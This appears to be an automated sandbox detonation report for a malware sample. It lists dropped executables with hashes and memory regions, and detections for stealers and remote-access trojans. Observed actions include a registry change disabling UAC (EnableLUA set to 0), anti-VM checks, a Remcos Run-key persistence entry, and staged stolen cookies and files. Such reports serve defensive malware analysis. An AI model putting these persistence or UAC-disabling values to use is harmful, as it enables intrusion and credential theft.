C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
| MD5 | 58f824a8f6a71da8e9a1acc97fc26d52 |
| SHA1 | b0e199e6f85626edebbecd13609a011cf953df69 |
| SHA256 | 5e5b808ed64c4f40e07a4894e1da294e364383f0a51adb7ec8c7568afba3eb17 |
| SHA512 | 7d6c752369ea83bad34873d8603c413e9372ff66adcaad11e7f23d3ce85827e057444b30eadf927329191825aef4dc37a1e68c30b71fae4ce6f53708102fb461 |
memory/5768-1564-0x0000000000EC0000-0x0000000001336000-memory.dmp
memory/5768-1565-0x0000000000EC0000-0x0000000001336000-memory.dmp
memory/5768-1572-0x0000000000EC0000-0x0000000001336000-memory.dmp
memory/2280-1576-0x00007FF67FF80000-0x00007FF680410000-memory.dmp
memory/2280-1593-0x00007FF67FF80000-0x00007FF680410000-memory.dmp
memory/5096-1605-0x00000000004E0000-0x0000000000C5B000-memory.dmp
memory/5768-1610-0x0000000000EC0000-0x0000000001336000-memory.dmp
memory/5472-1616-0x0000000002460000-0x0000000002496000-memory.dmp
memory/5472-1617-0x00000000050A0000-0x00000000056C8000-memory.dmp
memory/2120-1618-0x0000000005BD0000-0x0000000005C24000-memory.dmp
memory/5472-1619-0x0000000004E90000-0x0000000004EB2000-memory.dmp
memory/5472-1620-0x00000000056D0000-0x0000000005736000-memory.dmp
memory/5472-1621-0x0000000005740000-0x00000000057A6000-memory.dmp
memory/5472-1635-0x00000000058B0000-0x0000000005C04000-memory.dmp
memory/5472-1644-0x0000000005D50000-0x0000000005D6E000-memory.dmp
memory/5472-1645-0x0000000005D90000-0x0000000005DDC000-memory.dmp
memory/5472-2836-0x0000000070650000-0x000000007069C000-memory.dmp
memory/5472-2835-0x0000000006D30000-0x0000000006D62000-memory.dmp
memory/5472-2846-0x0000000006320000-0x000000000633E000-memory.dmp
memory/5472-2847-0x0000000006F70000-0x0000000007013000-memory.dmp
memory/5472-2848-0x00000000076D0000-0x0000000007D4A000-memory.dmp
memory/5472-2849-0x0000000007080000-0x000000000709A000-memory.dmp
memory/5472-2850-0x00000000070E0000-0x00000000070EA000-memory.dmp
memory/5472-2851-0x0000000007310000-0x00000000073A6000-memory.dmp
memory/5472-2852-0x0000000007280000-0x0000000007291000-memory.dmp
memory/5472-2854-0x00000000072B0000-0x00000000072BE000-memory.dmp
memory/5472-2855-0x00000000072C0000-0x00000000072D4000-memory.dmp
memory/5472-2856-0x00000000073D0000-0x00000000073EA000-memory.dmp
memory/5472-2857-0x0000000007300000-0x0000000007308000-memory.dmp
memory/5768-2861-0x0000000007230000-0x00000000072C2000-memory.dmp
memory/5768-2862-0x00000000074C0000-0x00000000074CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
| MD5 | 3297554944a2e2892096a8fb14c86164 |
| SHA1 | 4b700666815448a1e0f4f389135fddb3612893ec |
| SHA256 | e0a9fcd5805e66254aa20f8ddb3bdfca376a858b19222b178cc8893f914a6495 |
| SHA512 | 499aa1679f019e29b4d871a472d24b89adddc68978317f85f095c7278f25f926cbf532c8520c2f468b3942a3e37e9be20aea9f83c68e8b5e0c9adbf69640ad25 |
memory/3960-2872-0x00000000006F0000-0x00000000010CC000-memory.dmp
memory/3960-2873-0x00000000006F0000-0x00000000010CC000-memory.dmp
memory/3960-2874-0x00000000006F0000-0x00000000010CC000-memory.dmp
memory/3960-2880-0x0000000007E90000-0x0000000007F06000-memory.dmp
memory/3960-2879-0x0000000007A80000-0x0000000007A8A000-memory.dmp
memory/3960-2888-0x0000000008BA0000-0x0000000008BBE000-memory.dmp
memory/3960-2889-0x0000000008C70000-0x0000000008CDA000-memory.dmp
memory/3960-2890-0x0000000008CE0000-0x0000000009034000-memory.dmp
memory/3960-2891-0x0000000009080000-0x00000000090CC000-memory.dmp
memory/3960-2893-0x0000000009220000-0x00000000092D2000-memory.dmp
memory/3960-2894-0x0000000009330000-0x0000000009380000-memory.dmp
memory/3960-2896-0x0000000009440000-0x000000000947C000-memory.dmp
memory/3960-2897-0x0000000009400000-0x0000000009421000-memory.dmp
memory/3960-2898-0x000000000A090000-0x000000000A3BE000-memory.dmp
memory/3960-2930-0x000000000A690000-0x000000000A6A2000-memory.dmp
memory/5400-2953-0x0000000000400000-0x0000000000A9C000-memory.dmp
memory/3960-2981-0x00000000006F0000-0x00000000010CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
| MD5 | 87d7fffd5ec9e7bc817d31ce77dee415 |
| SHA1 | 6cc44ccc0438c65cdef248cc6d76fc0d05e79222 |
| SHA256 | 47ae8e5d41bbd1eb506a303584b124c3c8a1caeac4564252fa78856190f0f628 |
| SHA512 | 1d2c6ec8676cb1cfbe37f808440287ea6a658d3f21829b5001c3c08a663722eb0537cc681a6faa7d39dc16a101fa2bbf55989a64a7c16143f11aa96033b886a5 |
memory/5400-2998-0x0000000000400000-0x0000000000A9C000-memory.dmp
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
| MD5 | f89267b24ecf471c16add613cec34473 |
| SHA1 | c3aad9d69a3848cedb8912e237b06d21e1e9974f |
| SHA256 | 21f12abb6de14e72d085bc0bd90d630956c399433e85275c4c144cd9818cbf92 |
| SHA512 | c29176c7e1d58dd4e1deafcbd72956b8c27e923fb79d511ee244c91777d3b3e41d0c3977a8a9fbe094bac371253481dde5b58abf4f2df989f303e5d262e1ce4d |
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
| MD5 | 53e54ac43786c11e0dde9db8f4eb27ab |
| SHA1 | 9c5768d5ee037e90da77f174ef9401970060520e |
| SHA256 | 2f606d24809902af1bb9cb59c16a2c82960d95bff923ea26f6a42076772f1db8 |
| SHA512 | cd1f6d5f4d8cd19226151b6674124ab1e10950af5a049e8c082531867d71bfae9d7bc65641171fd55d203e4fba9756c80d11906d85a30b35ee4e8991adb21950 |
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
| MD5 | 5b39766f490f17925defaee5de2f9861 |
| SHA1 | 9c89f2951c255117eb3eebcd61dbecf019a4c186 |
| SHA256 | de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a |
| SHA512 | d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf |
memory/3372-3022-0x0000023F5C530000-0x0000023F5C9C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tmp1D42.tmp
| MD5 | 328231ff28d796b81f3a948d740390f9 |
| SHA1 | a846d6ee7d372650302703bcef37a3d1cc74cf58 |
| SHA256 | 3c991a7d9d237412de58d8b8e624f3ffc97054bddca0f814a6ec44d5ad89f7ed |
| SHA512 | c137ebca13a36b693b055502ef75fe368f82b2a3c980f2957051ea527ee65dcb12bc72a2d5b538d4d80fd0fbf6c5c6a2821bfe83d990f5489e2eff97c0992bee |
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0B750ED6B3120F01D0400662835BF43896F84DA7
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
| MD5 | 9821fa45714f3b4538cc017320f6f7e5 |
| SHA1 | 5bf0752889cefd64dab0317067d5e593ba32e507 |
| SHA256 | fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72 |
| SHA512 | 90afec395115d932ea272b11daa3245769bdcc9421ecd418722830259a64df19ed7eacca38000f6a846db9f4363817f13232032ab30f2ab1aa7e88097361d898 |
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
| MD5 | 4c64aec6c5d6a5c50d80decb119b3c78 |
| SHA1 | bc97a13e661537be68863667480829e12187a1d7 |
| SHA256 | 75c7692c0f989e63e14c27b4fb7d25f93760068a4ca4e90fa636715432915253 |
| SHA512 | 9054e3c8306999fe851b563a826ca7a87c4ba78c900cd3b445f436e8406f581e5c3437971a1f1dea3f5132c16a1b36c2dd09f2c97800d28e7157bd7dc3ac3e76 |
C:\Users\Admin\AppData\Local\Temp\a\888.exe
| MD5 | b6e5859c20c608bf7e23a9b4f8b3b699 |
| SHA1 | 302a43d218e5fd4e766d8ac439d04c5662956cc3 |
| SHA256 | bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075 |
| SHA512 | 60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c |
memory/2920-3148-0x00007FF67FF80000-0x00007FF680410000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
| MD5 | 47f6b0028c7d8b03e2915eb90d0d9478 |
| SHA1 | abc4adf0b050ccea35496c01f33311b84fba60c6 |
| SHA256 | c656d874c62682dd7af9ab4b7001afcc4aab15f3e0bc7cdfd9b3f40c15259e3f |
| SHA512 | ae4e7b9a9f4832fab3fe5c7ad7fc71ae5839fd8469e3cbd2f753592853a441aa89643914eda3838cd72afd6dee029dd29dc43eaf7db3adc989beab43643951a2 |
memory/5156-4381-0x000001E55BAB0000-0x000001E55C13E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\info.exe
| MD5 | ca298b43595a13e5bbb25535ead852f7 |
| SHA1 | 6fc8d0e3d36b245b2eb895f512e171381a96e268 |
| SHA256 | 0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e |
| SHA512 | 8c591cd0693b9516959c6d1c446f5619228021c1e7a95c208c736168cc90bc15dba47aca99aa6349f8e056a5c7f020c34b751d551260f9d3ba491b11cd953cf5 |
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp
| MD5 | 7cec98d7beca577470fd4edc6149b094 |
| SHA1 | 9891fdfe2a9561831a781418701cb3937f8d80f3 |
| SHA256 | 3c0d754b1c1d0a1b2cf38d116a2198247cc183ac10112c7094df65aab227781a |
| SHA512 | 8e9b79fb8f3c66459450e4e6d5788e7769d41ee65ad569de8edbf3254eaa61a5ff51ab453630150f804d53839839f5d25ccf28e93d95a01d69363cbf81f82332 |
memory/5464-5430-0x0000000000400000-0x000000000197D000-memory.dmp
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs
| MD5 | 2bc959c8f2f55c1289cc041729578447 |
| SHA1 | 991e7337a2c5a5a7741240c1e88893cad433fd6b |
| SHA256 | 2851e09bb43ffa178d796eedfccf9d7577239911bcaebde5c0a423f844c9e02a |
| SHA512 | 3fd2361d7b380420da3da75c99b9fb05402c2dc6b0c89fe81cb9d860e71d96aa23b155bb9d1fd8c21a27fc25c2690f0c73445aea32e2416976f264e76ee880ae |
memory/5464-5611-0x0000000000400000-0x000000000197D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\50.exe
| MD5 | 38c56adb21dc68729fcc9b2d97d72ac1 |
| SHA1 | c08c6d344aa88b87d7741d4b249dcc937dad0cea |
| SHA256 | 7807125f9d53afac3fe1037dd8def3f039cba5f57a170526bdaaf2e0e09365fb |
| SHA512 | c4f5a7fa9013dfe33a89dcca5640f37b5309b5ef354a5518877512bbbdc072ba8bfaebde0da3b55aacf0bdcbb443d368a3f60e91bedea6c1cc754393943ca530 |
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
| MD5 | b70651a7c5ec8cc35b9c985a331ffca3 |
| SHA1 | 8492a85c3122a7cac2058099fb279d36826d1f4d |
| SHA256 | ed9d94e2dfeb610cb43d00e1a9d8eec18547f1bca2f489605f0586969f6cd6d6 |
| SHA512 | 3819216764b29dad3fabfab42f25f97fb38d0f24b975366426ce3e345092fc446ff13dd93ab73d252ea5f77a7fc055ad251e7017f65d4de09b0c43601b5d3fd5 |
memory/2584-5734-0x0000000000650000-0x000000000075C000-memory.dmp
memory/2556-5745-0x00000000050F0000-0x0000000005144000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
| MD5 | a9255b6f4acf2ed0be0f908265865276 |
| SHA1 | 526591216c42b2ba177fcb927feee22267a2235d |
| SHA256 | 3f25f1c33d0711c5cc773b0e7a6793d2ae57e3bf918b176e2fa1afad55a7337a |
| SHA512 | 86d6eaf7d07168c3898ef0516bbd60ef0a2f5be097a979deb37cea90c71daff92da311c138d717e4bb542de1dbd88ef1b6f745b9acbfb23456dd59119d556a50 |
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
| MD5 | 230f75b72d5021a921637929a63cfd79 |
| SHA1 | 71af2ee3489d49914f7c7fa4e16e8398e97e0fc8 |
| SHA256 | a5011c165dbd8459396a3b4f901c7faa668e95e395fb12d7c967c34c0d974355 |
| SHA512 | 3dc11aac2231daf30871d30f43eba3eadf14f3b003dd1f81466cde021b0b59d38c5e9a320e6705b4f5a0eeebf93f9ee5459173e20de2ab3ae3f3e9988819f001 |
memory/5732-5824-0x000001F6AE0A0000-0x000001F6AE0F2000-memory.dmp
memory/1300-5823-0x00000262874B0000-0x00000262874F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
| MD5 | 6217bdb87132daca22cb3a9a7224b766 |
| SHA1 | be9b950b53a8af1b3d537494b0411f663e21ee51 |
| SHA256 | 49433ad89756ef7d6c091b37770b7bd3d187f5b6f5deb0c0fbcf9ee2b9e13b2e |
| SHA512 | 80de596b533656956ec3cda1da0b3ce36c0aa5d19b49b3fce5c854061672cf63ad543daaf9cf6a29a9c8e8b543c3630aab2aaea0dba6bf4f9c0d8214b7fadbe6 |
C:\Users\Admin\AppData\Local\Temp\tmpEC21.tmp.dat
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\tmpEC20.tmp.dat
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmpEBFF.tmp.dat
| MD5 | 2ba42ee03f1c6909ca8a6575bd08257a |
| SHA1 | 88b18450a4d9cc88e5f27c8d11c0323f475d1ae6 |
| SHA256 | a14fb57193e6930fa9e410d9c55dfe98e3ae5e69b22356e621edc73683a581bd |
| SHA512 | a1f32c22f0d78cba95c04c432e2a58ea47fb34942e70bfdceffcc2ac1e91b87a3da2cd9f93793427ee09a623c7da700e1c16977d41a44286317e8fc20502f035 |
memory/2572-5891-0x00000000001A0000-0x00000000001B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
| MD5 | db69b881c533823b0a6cc3457dae6394 |
| SHA1 | 4b9532efa31c638bcce20cdd2e965ad80f98d87b |
| SHA256 | 362d1d060b612cb88ec9a1835f9651b5eff1ef1179711892385c2ab44d826969 |
| SHA512 | b9fe75ac47c1aa2c0ba49d648598346a26828e7aa9f572d6aebece94d8d3654d82309af54173278be27f78d4b58db1c3d001cb50596900dee63f4fb9988fb6df |
memory/728-5934-0x0000000000EC0000-0x0000000000ED6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
| MD5 | 4d58df8719d488378f0b6462b39d3c63 |
| SHA1 | 4cbbf0942aeb81cc7d0861d3df5c9990c0c0c118 |
| SHA256 | ecf528593210cf58333743a790294e67535d3499994823d79a1c8d4fa40ec88d |
| SHA512 | 73a5fea0cf66636f1f7e1cf966a7d054e01162c6e8f1fc95626872d9e66ea00018a15a1b5615f5398c15316e50bf40336c124c7320b1d66893c1edb16c36b738 |
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
| MD5 | 2a4ccc3271d73fc4e17d21257ca9ee53 |
| SHA1 | 931b0016cb82a0eb0fd390ac33bada4e646abae3 |
| SHA256 | 5332f713bef3ab58d7546f2b58e6eaf55c3e30969e15b6085a77e7fd9e7b65b4 |
| SHA512 | 00d6728fa5c2692dab96107187126a44e09976f0d26875f340b3ad0d3f202abb4fbc5426f2934096087ef6e404bc1dc21b6e6ebbacba172c383d57bdef185a74 |
memory/5340-5972-0x0000000000F30000-0x0000000001180000-memory.dmp
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new
| MD5 | 008a029b0044f4fb3806301138072816 |
| SHA1 | 586ea27e9e08f170d1dfb4a45e0266ac07b341d8 |
| SHA256 | de6c01cd7762eeb1099c58faf94a707663422d43ed63deb84c68385ca4913f63 |
| SHA512 | 883cff3fe5cbfbddd2bbb5adbcad3e730b6de19c4cf1c6b5c91388a5ef0168cac6d65a74b413e6118e1ee0cf28172c1ffe8d916bf36b39b659c320d2699de5ae |
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
| MD5 | eaef085a8ffd487d1fd11ca17734fb34 |
| SHA1 | 9354de652245f93cddc2ae7cc548ad9a23027efa |
| SHA256 | 1e2731a499887de305b1878e2ad6b780ff90e89bc9be255ae2f4c6fa56f5cf35 |
| SHA512 | bfda0cb7297d71ad6bf74ec8783e279547740036dd9f42f15640d8700216cdd859b83cc720e9f3889a8743671b4d625774f87e0d1768f46d018fccaf4dbef20e |
memory/5608-6032-0x0000000000010000-0x0000000000260000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
| MD5 | aeb9f8515554be0c7136e03045ee30ac |
| SHA1 | 377be750381a4d9bda2208e392c6978ea3baf177 |
| SHA256 | 7f671b0f622d94aebf0c6ab2f021b18e1c60beda819bc48c0b2c6a8f5fdd7e02 |
| SHA512 | d0cfc09d01bd42e0e42564f99332030ed2ff20624bfd83a3f1bb3682fe004e90d89539f5868bba637287795e2668dd14409e2e0ed2ea1c6982c7ce11db727bb4 |
memory/5292-6057-0x0000000000CA0000-0x0000000000EF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
| MD5 | aa7c3909bcc04a969a1605522b581a49 |
| SHA1 | e6b0be06c7a8eb57fc578c40369f06360e9d70c9 |
| SHA256 | 19fcd2a83cd54c9b1c9bd9f8f6f7792e7132156b09a8180ce1da2fe6e2eeaaab |
| SHA512 | f06b7e9efe312a659fd047c80df637dba7938035b3fd5f03f4443047f4324af9234c28309b0b927b70834d15d06f0d8e8a78ba6bd7a6db62c375df3974ce8bd0 |
memory/5744-6061-0x0000000000280000-0x0000000000298000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
| MD5 | d4a8ad6479e437edc9771c114a1dc3ac |
| SHA1 | 6e6970fdcefd428dfe7fbd08c3923f69e21e7105 |
| SHA256 | a018a52ca34bf027ae3ef6b4121ec5d79853f84253e3fad161c36459f566ac2b |
| SHA512 | de181dc79ca4c52ce8de3abc767fbb8b4fd6904d278fa310eee4a66056161c0b9960ef7bebf2ebf6a9d19b653190895e5d1df92c314ca04af748351d6fb53e07 |
C:\Users\Admin\AppData\Local\44\Process.txt
| MD5 | 98c9e9af730a27bf19a9703132d29bce |
| SHA1 | 5f02627db32179ac3edc56005762477743357cfb |
| SHA256 | 5000d8dbe0058f08b0e12c9d2af3ad6fb3ff197213ecd4657582e72d81c5a808 |
| SHA512 | ad5b013a8136cef7a8e8d407cf7d63e4fbe4b8dd66d6e8d3632bdcdd08c5eadbc3f348c5281724bb07ca1c4639e604e528574113303a9c12905b432c29cbcec5 |
memory/5608-6429-0x0000000000010000-0x0000000000260000-memory.dmp
memory/1652-6435-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp
C:\Users\Admin\AppData\Local\44\Process.txt
| MD5 | 8bb1d3611cdc1c42febe5bb10085e227 |
| SHA1 | 51c9cb6d2333190ddeb728039f736ff9b2e9c3a0 |
| SHA256 | 3d3053a0d225433ac405989dd7e4a80dc9b6ee147511bca3c18b56d5c2c09dbb |
| SHA512 | 91e7103e121a427b676efb968acf6ef7fbdb99e0dc360e7f973c5ac8358146a510dfc8299201bcc65346d1e79821b4e123697b88d2fb992f2955fc7702213d2b |
C:\Users\Admin\AppData\Local\Temp\rascqn.exe
| MD5 | 7353f60b1739074eb17c5f4dddefe239 |
| SHA1 | 6cbce4a295c163791b60fc23d285e6d84f28ee4c |
| SHA256 | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c |
| SHA512 | bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c |
memory/4444-6534-0x0000000006280000-0x00000000065D4000-memory.dmp
memory/4280-6545-0x000001406B9A0000-0x000001406B9E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\History
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\Users\Admin\AppData\Local\Temp\Cookies
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\sensitive-files.zip
| MD5 | 35a512d0a0fcd92a78e0a07d2ee5b42f |
| SHA1 | fe53e9ec4832c2e3f2369d1391bdc0af99a9649f |
| SHA256 | 2e249f59c06f74e9759aaeeb2cec12a14812f0fb091621accc6f73ddd99912f7 |
| SHA512 | a9e9da1404e7a63667c118b02c18a3e35ad72dcacedbdcd3891040e27c4b03fe0b57b632b74ecb58dfa7db6588473f27bd5616d88288cd8bec6e77d5ab8ca536 |
C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\user_info.txt
| MD5 | ea1a4b63623b56d3fe7e6f98d57beaa8 |
| SHA1 | aa3ede875b64003d3044dc6049ac61521b496008 |
| SHA256 | 57ee9ce5b0367764d7b23d03e71d2eb2abecbd0a90ae3d16f0c7a4e6e523bd2d |
| SHA512 | 259ab6a120a22450c3726dbbfff20544e74ff0a7e894cd6cad4c82a20856a928b3b0574f57e59858783644545daa8268d8a85c87549a5179198b5ee72717a2d2 |
C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\screen1.png
| MD5 | 122ccdd6af3f4f83664eb7c1878c0d82 |
| SHA1 | 76710e508cea20e57649d3afb0686eb44fff5208 |
| SHA256 | e6a4719de90be014fd62c6237114ba78d1431f12082895e8f82c65e8687d1bdb |
| SHA512 | 9c2c3d954528cfb23546a6b20a3f23ae991c842f210f227380eaff5bb7014a4f20eace15ff100fe278a6559d2eef8643bf9cdc3c51b6e03a7523e614af3fafba |
C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\Cookies\Chrome_Default_Network.txt
| MD5 | e531d4f2d5e8f1c28116eed93558eab8 |
| SHA1 | c8633f7e6383a00feaa3e4a9570486942267ee86 |
| SHA256 | 68ef2f26ded177b3efade41f1a03e3a3ee3169c1c62d594bb505123d1ab33183 |
| SHA512 | 9e29e48c24401cdaa1a1b2c5bce9a7433d91af4b383004875a7961402c4a90bbe69b0de1b9dea9ede3dac6e6da5ced56f899eb91a66e725e0f48d1678d1cd720 |
C:\Users\Admin\AppData\Local\Temp\tmp5DC3.tmp.dat
| MD5 | b24f8b8f6cc374ef423424348437ede6 |
| SHA1 | eff0bcd8ae39f065d09a0b75de919093302646d3 |
| SHA256 | 14d3ad79b4ce62e53ec83a469cdd0a81763311709df8819301827a9671f67092 |
| SHA512 | 6a61771c7f3688dc16a2ac8d25b79bbb659444842e7fc7eb62d697b6061d5bba78b93149a653dd89ffa3bd8f21fe8d0c0371c8382cb5decb07ff31c4556597ad |
C:\Users\Admin\AppData\Local\Temp\tmp5DC2.tmp.dat
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-12 18:19
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
123s
Max time network
301s
Command Line
Signatures
44Caliber
44Caliber family
Detect Umbral payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RMS
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Redline family
Rms family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 5316 created 5204 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 5620 created 3200 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\schtasks.exe |
| PID 5204 created 4012 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe |
| PID 6732 created 2080 | N/A | N/A | C:\Windows\System32\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
